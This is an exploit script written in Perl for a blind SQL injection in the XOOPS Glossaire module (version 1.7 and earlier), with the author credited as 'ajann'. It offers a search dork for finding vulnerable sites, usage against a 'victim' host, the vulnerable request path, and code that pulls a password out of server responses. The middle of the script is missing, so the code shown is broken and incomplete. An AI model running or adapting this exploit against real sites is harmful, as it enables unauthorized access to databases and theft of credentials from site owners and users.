#!/usr/bin/perl #[Script Name: XOOPS Module Glossarie <= 1.7 (sid) Remote BLIND SQL Injection Exploit #[Coded by : ajann #[Author : ajann #[Contact : :( #[Dork : "inurl:/modules/glossaire/" #[S.Page : http://www.xoops.org/modules/repository/singlefile.php?cid=100&lid=1156 #[$$ : Free #[.. : ajann,Turkey use IO::Socket; if(@ARGV < 1){ print " [======================================================================== [// XOOPS Module Glossarie <= 1.7 (sid) Remote BLIND SQL Injection Exploit [// Usage: exploit.pl [target] [// Example: exploit.pl victim.com [// Example: exploit.pl victim.com [// Vuln&Exp : ajann [======================================================================== "; exit(); } #Local variables $kapan = "/*"; $server = $ARGV[0]; $server =~ s/(http:\/\/)//eg; $host = "http://".$server; $port = "80"; $file = "/modules/glossaire/glossaire-p-f.php?op=ImprDef&sid="; print "Script
/){ print "+ Password: $1\n"; } if ($answer =~ /Syntax error/) { print "+ Exploit Failed : ( \n"; print "+**********************************************************************+\n"; exit(); } if ($answer =~ /Internal Server Error/) { print "+ Exploit Failed : ( \n"; print "+**********************************************************************+\n"; exit(); } }